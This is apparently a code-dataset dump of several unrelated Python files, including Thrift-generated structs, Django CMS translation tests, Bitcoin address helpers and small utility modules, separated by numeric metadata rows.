        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)


class query_result(object):
    """
    Attributes:
     - success
    """

    thrift_spec = (
        (0, TType.STRUCT, 'success', (ExtensionResponse, ExtensionResponse.thrift_spec), None, ),  # 0
    )

    def __init__(self, success=None,):
        self.success = success

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.STRUCT:
                    self.success = ExtensionResponse()
                    self.success.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('query_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.STRUCT, 0)
            self.success.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)


class getQueryColumns_args(object):
    """
    Attributes:
     - sql
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRING, 'sql', 'UTF8', None, ),  # 1
    )

    def __init__(self, sql=None,):
        self.sql = sql

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.sql = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('getQueryColumns_args')
        if self.sql is not None:
            oprot.writeFieldBegin('sql', TType.STRING, 1)
            oprot.writeString(self.sql.encode('utf-8') if sys.version_info[0] == 2 else self.sql)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)


class getQueryColumns_result(object):
    """
    Attributes:
     - success
    """

    thrift_spec = (
        (0, TType.STRUCT, 'success', (ExtensionResponse, ExtensionResponse.thrift_spec), None, ),  # 0
    )

    def __init__(self, success=None,):
        self.success = success

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.STRUCT:
                    self.success = ExtensionResponse()
                    self.success.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('getQueryColumns_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.STRUCT, 0)
            self.success.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
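
A minimal round-trip sketch for the generated structs above, assuming the standard Apache Thrift Python runtime (the thrift package, which provides TMemoryBuffer and TBinaryProtocol); the SQL string is an arbitrary example:

from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol

# Serialize a query_args struct into an in-memory transport...
write_buf = TTransport.TMemoryBuffer()
args = query_args(sql='SELECT 1;')
args.write(TBinaryProtocol.TBinaryProtocol(write_buf))

# ...and read it back; __eq__ above compares the instance dicts, so this holds.
decoded = query_args()
decoded.read(TBinaryProtocol.TBinaryProtocol(TTransport.TMemoryBuffer(write_buf.getvalue())))
assert decoded == args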

| 35.111993 | 206 | 0.585931 | 4,032 | 39,817 | 5.542659 | 0.055556 | 0.02998 | 0.026177 | 0.012887 | 0.794344 | 0.764274 | 0.736755 | 0.723465 | 0.718275 | 0.718275 | 0 | 0.0106 | 0.310521 | 39,817 | 1,133 | 207 | 35.142983 | 0.803446 | 0.014994 | 0 | 0.776286 | 1 | 0 | 0.029247 | 0.003046 | 0 | 0 | 0 | 0 | 0 | 1 | 0.128635 | false | 0.006711 | 0.008949 | 0.040268 | 0.263982 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |

1d61ab9fba7efd5dfa88a7e441c5087a4284368c | 326 | py | Python | rastervision/v2/rv/data/label_source/__init__.py | carderne/raster-vision | 915fbcd3263d8f2193e65c2cd0eb53e050a47a01 | ["Apache-2.0"] | 1 | 2019-11-07T10:02:23.000Z | 2019-11-07T10:02:23.000Z | rastervision/v2/rv/data/label_source/__init__.py | carderne/raster-vision | 915fbcd3263d8f2193e65c2cd0eb53e050a47a01 | ["Apache-2.0"] | null | null | null | rastervision/v2/rv/data/label_source/__init__.py | carderne/raster-vision | 915fbcd3263d8f2193e65c2cd0eb53e050a47a01 | ["Apache-2.0"] | null | null | null |

# flake8: noqa
from rastervision.v2.rv.data.label_source.label_source import *
from rastervision.v2.rv.data.label_source.label_source_config import *
from rastervision.v2.rv.data.label_source.chip_classification_label_source import *
from rastervision.v2.rv.data.label_source.chip_classification_label_source_config import *

| 46.571429 | 90 | 0.858896 | 48 | 326 | 5.541667 | 0.270833 | 0.330827 | 0.270677 | 0.300752 | 0.894737 | 0.894737 | 0.894737 | 0.894737 | 0.894737 | 0.721805 | 0 | 0.01634 | 0.06135 | 326 | 6 | 91 | 54.333333 | 0.852941 | 0.03681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 13 |

d55ba80178c16ae63abedf6657efe8885b2e98ad | 11,368 | py | Python | tests/providers/test_supertext.py | divio/djangocms-translations | 9bfde2fed91973160bbe50ccbd6b4e2a2f4ba07f | ["BSD-3-Clause"] | 3 | 2019-01-14T13:30:38.000Z | 2020-08-10T22:16:06.000Z | tests/providers/test_supertext.py | divio/djangocms-translations | 9bfde2fed91973160bbe50ccbd6b4e2a2f4ba07f | ["BSD-3-Clause"] | 5 | 2018-12-20T13:56:47.000Z | 2021-07-20T07:13:01.000Z | tests/providers/test_supertext.py | divio/djangocms-translations | 9bfde2fed91973160bbe50ccbd6b4e2a2f4ba07f | ["BSD-3-Clause"] | null | null | null |

# -*- coding: utf-8 -*-
import json

from cms.api import add_plugin, create_page
from cms.test_utils.testcases import CMSTestCase
from djangocms_transfer.exporter import export_page

from djangocms_translations.providers.supertext import (
    _get_translation_export_content, _set_translation_import_content,
)


class GetTranslationExportContentTestCase(CMSTestCase):
    def setUp(self):
        super(GetTranslationExportContentTestCase, self).setUp()
        self.page = create_page('test page', 'test_page.html', 'en', published=True)
        self.placeholder = self.page.placeholders.get(slot='content')

    def _export_page(self):
        return json.loads(export_page(self.page, 'en'))

    def test_textfield_without_children(self):
        raw_content = '<p>Please <a href="http://www.google.com">CLICK ON LINK1</a> to go to link1.</p>'
        add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body=raw_content)
        plugin = self._export_page()[0]['plugins'][0]
        result, children_included_in_this_content = _get_translation_export_content('body', plugin)
        self.assertEquals(result, raw_content)
        self.assertEquals(children_included_in_this_content, [])

    def test_textfield_with_children(self):
        parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
        child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
        parent_body = (
            '<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1.</p>'
        ).format(child1.pk)
        parent.body = parent_body
        parent.save()
        plugin = self._export_page()[0]['plugins'][0]
        result, children_included_in_this_content = _get_translation_export_content('body', plugin)
        expected = (
            parent_body
            .replace('></cms-plugin>', '>CLICK ON LINK1</cms-plugin>', 1)
        )
        self.assertEquals(result, expected)
        self.assertEquals(children_included_in_this_content, [child1.pk])

    def test_textfield_with_multiple_children(self):
        parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
        child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
        child2 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK2')
        parent_body = (
            '<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1 '
            'or <cms-plugin id="{}"></cms-plugin> to go to link2.</p>'
        ).format(child1.pk, child2.pk)
        parent.body = parent_body
        parent.save()
        plugin = self._export_page()[0]['plugins'][0]
        result, children_included_in_this_content = _get_translation_export_content('body', plugin)
        expected = (
            parent_body
            .replace('></cms-plugin>', '>CLICK ON LINK1</cms-plugin>', 1)
            .replace('></cms-plugin>', '>CLICK ON LINK2</cms-plugin>', 1)
        )
        self.assertEquals(result, expected)
        self.assertEquals(children_included_in_this_content, [child1.pk, child2.pk])

    def test_textfield_with_multiple_children_one_deleted(self):
        parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
        child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
        child2 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK2')
        parent_body = (
            '<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1 '
            'or <cms-plugin id="{}"></cms-plugin> to go to link2.</p>'
        ).format(child1.pk, child2.pk)
        parent.body = parent_body
        parent.save()
        plugin = self._export_page()[0]['plugins'][0]
        child1.delete()
        result, children_included_in_this_content = _get_translation_export_content('body', plugin)
        expected = (
            '<p>Please to go to link1 '
            'or <cms-plugin id="{}">CLICK ON LINK2</cms-plugin> to go to link2.</p>'
        ).format(child2.pk)
        self.assertEquals(result, expected)
        self.assertEquals(children_included_in_this_content, [child2.pk])

    def test_dummy_textfield2_with_children(self):
        ''' DummyText2Plugin implementation defines get_translation_export_content with a simple str return. '''
        parent = add_plugin(self.placeholder, 'DummyText2Plugin', 'en', body='')
        child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
        parent_body = (
            '<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1.</p>'
        ).format(child1.pk)
        parent.body = parent_body
        parent.save()
        plugin = self._export_page()[0]['plugins'][0]
        result, children_included_in_this_content = _get_translation_export_content('body', plugin)
        self.assertEquals(result, 'super dummy overwritten content')
        self.assertEquals(children_included_in_this_content, [])

    def test_dummy_textfield3_with_children(self):
        ''' DummyText3Plugin implementation does not define get_translation_export_content. '''
        parent = add_plugin(self.placeholder, 'DummyText3Plugin', 'en', body='')
        child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
        parent_body = (
            '<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1.</p>'
        ).format(child1.pk)
        parent.body = parent_body
        parent.save()
        plugin = self._export_page()[0]['plugins'][0]
        result, children_included_in_this_content = _get_translation_export_content('body', plugin)
        self.assertEquals(result, parent.body)
        self.assertEquals(children_included_in_this_content, [])

    def test_textfield_with_children_non_translatable(self):
        parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
        child1 = add_plugin(self.placeholder, 'DummySpacerPlugin', 'en', target=parent)
        parent_body = (
            '<p>This is cool <cms-plugin id="{}"></cms-plugin> this is nice.</p>'
        ).format(child1.pk)
        parent.body = parent_body
        parent.save()
        plugin = self._export_page()[0]['plugins'][0]
        result, children_included_in_this_content = _get_translation_export_content('body', plugin)
        expected = (
            parent_body
        )
        self.assertEquals(result, expected)
        self.assertEquals(children_included_in_this_content, [child1.pk])


class SetTranslationImportContentTestCase(CMSTestCase):
    def setUp(self):
        super(SetTranslationImportContentTestCase, self).setUp()
        self.page = create_page('test page', 'test_page.html', 'en', published=True)
        self.placeholder = self.page.placeholders.get(slot='content')

    def _export_page(self):
        return json.loads(export_page(self.page, 'en'))

    def test_textfield_without_children(self):
        raw_content = '<p>Please <a href="http://www.google.com">CLICK ON LINK1</a> to go to link1.</p>'
        add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body=raw_content)
        plugin = self._export_page()[0]['plugins'][0]
        result = _set_translation_import_content(_get_translation_export_content('body', plugin)[0], plugin)
        self.assertDictEqual(result, {})

    def test_textfield_with_children(self):
        parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
        child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
        parent_body = (
            '<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1.</p>'
        ).format(child1.pk)
        parent.body = parent_body
        parent.save()
        plugin = self._export_page()[0]['plugins'][0]
        result = _set_translation_import_content(_get_translation_export_content('body', plugin)[0], plugin)
        self.assertDictEqual(result, {child1.pk: 'CLICK ON LINK1'})

    def test_textfield_with_multiple_children(self):
        parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
        child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
        child2 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK2')
        parent_body = (
            '<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1 '
            'or <cms-plugin id="{}"></cms-plugin> to go to link2.</p>'
        ).format(child1.pk, child2.pk)
        parent.body = parent_body
        parent.save()
        plugin = self._export_page()[0]['plugins'][0]
        result = _set_translation_import_content(_get_translation_export_content('body', plugin)[0], plugin)
        self.assertDictEqual(result, {child1.pk: 'CLICK ON LINK1', child2.pk: 'CLICK ON LINK2'})

    def test_textfield_with_multiple_children_one_deleted(self):
        parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
        child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
        child2 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK2')
        parent_body = (
            '<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1 '
            'or <cms-plugin id="{}"></cms-plugin> to go to link2.</p>'
        ).format(child1.pk, child2.pk)
        parent.body = parent_body
        parent.save()
        plugin = self._export_page()[0]['plugins'][0]
        child1.delete()
        result = _set_translation_import_content(_get_translation_export_content('body', plugin)[0], plugin)
        self.assertDictEqual(result, {child2.pk: 'CLICK ON LINK2'})

    def test_dummy_textfield2_with_children(self):
        ''' DummyText2Plugin implementation defines get_translation_export_content with a simple str return. '''
        parent = add_plugin(self.placeholder, 'DummyText2Plugin', 'en', body='')
        child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
        parent_body = (
            '<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1.</p>'
        ).format(child1.pk)
        parent.body = parent_body
        parent.save()
        plugin = self._export_page()[0]['plugins'][0]
        result = _set_translation_import_content(_get_translation_export_content('body', plugin)[0], plugin)
        self.assertDictEqual(result, {42: 'because I want this to be id=42'})

    def test_dummy_textfield3_with_children(self):
        ''' DummyText3Plugin implementation does not define get_translation_export_content. '''
        parent = add_plugin(self.placeholder, 'DummyText3Plugin', 'en', body='')
        child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
        parent_body = (
            '<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1.</p>'
        ).format(child1.pk)
        parent.body = parent_body
        parent.save()
        plugin = self._export_page()[0]['plugins'][0]
        result = _set_translation_import_content(_get_translation_export_content('body', plugin)[0], plugin)
        self.assertDictEqual(result, {})
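
The behaviour pinned down by these tests is a tag round trip: on export, each empty <cms-plugin id="N"></cms-plugin> tag in a parent's body is filled with the child plugin's translatable text, and on import the translated text is extracted back out keyed by plugin id. A simplified sketch of that string transformation (the real helpers in djangocms_translations.providers.supertext also consult each plugin class and handle deleted children; this regex version only illustrates the idea):

import re

TAG = re.compile(r'<cms-plugin id="(\d+)">(.*?)</cms-plugin>', re.DOTALL)

def inline_children(body, labels):
    # Fill each empty <cms-plugin> tag with its child's translatable text.
    return TAG.sub(
        lambda m: '<cms-plugin id="%s">%s</cms-plugin>'
                  % (m.group(1), labels[int(m.group(1))]),
        body)

def extract_children(translated_body):
    # Inverse step used on import: plugin pk -> translated text.
    return {int(pk): text for pk, text in TAG.findall(translated_body)}

body = '<p>Please <cms-plugin id="7"></cms-plugin> to go to link1.</p>'
filled = inline_children(body, {7: 'CLICK ON LINK1'})
assert extract_children(filled) == {7: 'CLICK ON LINK1'}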

| 46.4 | 112 | 0.658427 | 1,351 | 11,368 | 5.314582 | 0.085122 | 0.069638 | 0.050696 | 0.093593 | 0.920752 | 0.904596 | 0.904596 | 0.898747 | 0.891643 | 0.891643 | 0 | 0.015028 | 0.203906 | 11,368 | 244 | 113 | 46.590164 | 0.778343 | 0.033427 | 0 | 0.839572 | 0 | 0.048128 | 0.209158 | 0.029736 | 0 | 0 | 0 | 0 | 0.106952 | 1 | 0.090909 | false | 0 | 0.074866 | 0.010695 | 0.187166 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |

d56e395b96f53ab2dd033be4883ecfb2e4dc9833 | 1,964 | py | Python | src/helper_bitcoin.py | coffeedogs/PyBitmessage | 634a49cd6d8fc2f52504586be4c4766340641b25 | ["MIT"] | 5 | 2015-01-28T04:45:09.000Z | 2017-08-08T10:59:06.000Z | BitmessageKit/Vendor/pybitmessage/helper_bitcoin.py | VoluntaryLabs/BitmessageKit | dd634977a629ab4dec184e12bb6324cc01149ba3 | ["MIT"] | 4 | 2019-11-30T14:01:12.000Z | 2020-01-03T13:20:57.000Z | BitmessageKit/Vendor/pybitmessage/helper_bitcoin.py | VoluntaryLabs/BitmessageKit | dd634977a629ab4dec184e12bb6324cc01149ba3 | ["MIT"] | 3 | 2016-01-11T12:36:31.000Z | 2021-02-12T19:36:44.000Z |

import hashlib

from pyelliptic import arithmetic


# This function expects that pubkey begin with \x04
def calculateBitcoinAddressFromPubkey(pubkey):
    if len(pubkey) != 65:
        print 'Could not calculate Bitcoin address from pubkey because function was passed a pubkey that was', len(pubkey), 'bytes long rather than 65.'
        return "error"
    ripe = hashlib.new('ripemd160')
    sha = hashlib.new('sha256')
    sha.update(pubkey)
    ripe.update(sha.digest())
    ripeWithProdnetPrefix = '\x00' + ripe.digest()
    checksum = hashlib.sha256(hashlib.sha256(
        ripeWithProdnetPrefix).digest()).digest()[:4]
    binaryBitcoinAddress = ripeWithProdnetPrefix + checksum
    numberOfZeroBytesOnBinaryBitcoinAddress = 0
    while binaryBitcoinAddress[0] == '\x00':
        numberOfZeroBytesOnBinaryBitcoinAddress += 1
        binaryBitcoinAddress = binaryBitcoinAddress[1:]
    base58encoded = arithmetic.changebase(binaryBitcoinAddress, 256, 58)
    return "1" * numberOfZeroBytesOnBinaryBitcoinAddress + base58encoded


def calculateTestnetAddressFromPubkey(pubkey):
    if len(pubkey) != 65:
        print 'Could not calculate testnet address from pubkey because function was passed a pubkey that was', len(pubkey), 'bytes long rather than 65.'
        return "error"
    ripe = hashlib.new('ripemd160')
    sha = hashlib.new('sha256')
    sha.update(pubkey)
    ripe.update(sha.digest())
    ripeWithProdnetPrefix = '\x6F' + ripe.digest()
    checksum = hashlib.sha256(hashlib.sha256(
        ripeWithProdnetPrefix).digest()).digest()[:4]
    binaryBitcoinAddress = ripeWithProdnetPrefix + checksum
    numberOfZeroBytesOnBinaryBitcoinAddress = 0
    while binaryBitcoinAddress[0] == '\x00':
        numberOfZeroBytesOnBinaryBitcoinAddress += 1
        binaryBitcoinAddress = binaryBitcoinAddress[1:]
    base58encoded = arithmetic.changebase(binaryBitcoinAddress, 256, 58)
    return "1" * numberOfZeroBytesOnBinaryBitcoinAddress + base58encoded

| 43.644444 | 152 | 0.729124 | 182 | 1,964 | 7.868132 | 0.307692 | 0.02514 | 0.015363 | 0.023743 | 0.886872 | 0.886872 | 0.886872 | 0.886872 | 0.886872 | 0.886872 | 0 | 0.043936 | 0.177189 | 1,964 | 44 | 153 | 44.636364 | 0.842203 | 0.024949 | 0 | 0.842105 | 0 | 0 | 0.154731 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.052632 | 0.052632 | null | null | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |

d58bfd0aeafa7bf026d16155b6d31fd4e8a49ef3 | 105 | py | Python | pogom/pgoapi/__init__.py | jskoizumi/pkgohi | 619748338587e0201f303b653ce9c04694653385 | ["MIT"] | 6 | 2016-07-21T20:23:29.000Z | 2016-10-14T16:50:21.000Z | pogom/pgoapi/__init__.py | jskoizumi/pkgohi | 619748338587e0201f303b653ce9c04694653385 | ["MIT"] | 4 | 2016-07-21T20:39:19.000Z | 2016-07-25T13:51:41.000Z | pogom/pgoapi/__init__.py | jskoizumi/pkgohi | 619748338587e0201f303b653ce9c04694653385 | ["MIT"] | null | null | null |

from pgoapi import *
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()

| 21 | 44 | 0.8 | 12 | 105 | 6.916667 | 0.666667 | 0.385542 | 0.554217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 0.12381 | 105 | 5 | 44 | 21 | 0.880435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |

d59da3f6088790bcf831703d1fe1571d16568ca1 | 237 | py | Python | myPackageAna/__init__.py | anajikadam17/myPackageAna | 61bffd28c6b87240363bf2d42020852cd25e3cf6 | ["MIT"] | null | null | null | myPackageAna/__init__.py | anajikadam17/myPackageAna | 61bffd28c6b87240363bf2d42020852cd25e3cf6 | ["MIT"] | null | null | null | myPackageAna/__init__.py | anajikadam17/myPackageAna | 61bffd28c6b87240363bf2d42020852cd25e3cf6 | ["MIT"] | null | null | null |

def add_numbers(num1, num2):
    return num1 + num2


def subtract_numbers(num1, num2):
    return num1 - num2


def multiply_numbers(num1, num2):
    return num1 * num2


def divide_numbers(num1, num2):
    return num1 / num2
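
A quick sanity check of the four helpers (note that / is true division in Python 3, so divide_numbers returns a float):

assert add_numbers(2, 3) == 5
assert subtract_numbers(2, 3) == -1
assert multiply_numbers(2, 3) == 6
assert divide_numbers(3, 2) == 1.5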

| 18.230769 | 34 | 0.662447 | 32 | 237 | 4.78125 | 0.28125 | 0.418301 | 0.392157 | 0.54902 | 0.816993 | 0.816993 | 0.627451 | 0 | 0 | 0 | 0 | 0.090395 | 0.253165 | 237 | 12 | 35 | 19.75 | 0.774011 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |

6392722bd5525b0311d5259fc6ed905542a05288 | 798 | py | Python | examples/grid2d.py | eddy-ilg/itypes | eaf1c4a86576c77caa34148c0fdc6b2e012119ff | ["MIT"] | null | null | null | examples/grid2d.py | eddy-ilg/itypes | eaf1c4a86576c77caa34148c0fdc6b2e012119ff | ["MIT"] | null | null | null | examples/grid2d.py | eddy-ilg/itypes | eaf1c4a86576c77caa34148c0fdc6b2e012119ff | ["MIT"] | null | null | null |

#!/usr/bin/env python3

from itypes import Grid2D

g = Grid2D(none_in_range=True, none_outside_range=True)

g[1, 2] = "x"
print(f'min_col={g.min_col()} max_col={g.max_col()} num_cols={g.num_cols()} '
      f'min_row={g.min_row()} max_row={g.max_row()} num_rows={g.num_rows()}')
print(f'g[0, 0] = {g[0,0]}')
print(f'g[1, 2] = {g[1,2]}')
print(f'g[2, 2] = {g[2,2]}')

g[2, 2] = "y"
print(f'min_col={g.min_col()} max_col={g.max_col()} num_cols={g.num_cols()} '
      f'min_row={g.min_row()} max_row={g.max_row()} num_rows={g.num_rows()}')
print(f'g[0, 0] = {g[0,0]}')
print(f'g[1, 2] = {g[1,2]}')
print(f'g[2, 2] = {g[2,2]}')

del g[2, 2]
print(f'min_col={g.min_col()} max_col={g.max_col()} num_cols={g.num_cols()} '
      f'min_row={g.min_row()} max_row={g.max_row()} num_rows={g.num_rows()}')

| 26.6 | 77 | 0.592732 | 177 | 798 | 2.446328 | 0.163842 | 0.124711 | 0.096998 | 0.083141 | 0.785219 | 0.785219 | 0.778291 | 0.778291 | 0.722864 | 0.722864 | 0 | 0.046942 | 0.119048 | 798 | 29 | 78 | 27.517241 | 0.56899 | 0.026316 | 0 | 0.588235 | 0 | 0 | 0.664516 | 0.503226 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.058824 | 0.529412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |

895e66ff4ad74bf41e6e03be1c347525eca98c1f | 200 | py | Python | utils/__init__.py | florianthonig/listen-attend-and-spell | 218dd4f200cd564d3052c550dbbfe1f2cd836008 | ["Apache-2.0"] | 96 | 2018-06-06T08:01:37.000Z | 2021-10-06T03:40:00.000Z | utils/__init__.py | florianthonig/listen-attend-and-spell | 218dd4f200cd564d3052c550dbbfe1f2cd836008 | ["Apache-2.0"] | 10 | 2018-06-28T02:33:14.000Z | 2019-07-08T07:22:29.000Z | utils/__init__.py | florianthonig/listen-attend-and-spell | 218dd4f200cd564d3052c550dbbfe1f2cd836008 | ["Apache-2.0"] | 37 | 2018-08-09T16:42:28.000Z | 2021-10-21T03:42:59.000Z |

from utils.dataset_utils import *
from utils.iterator_utils import *
from utils.vocab_utils import *
from utils.metrics_utils import *
from utils.image_utils import *
from utils.params_utils import *

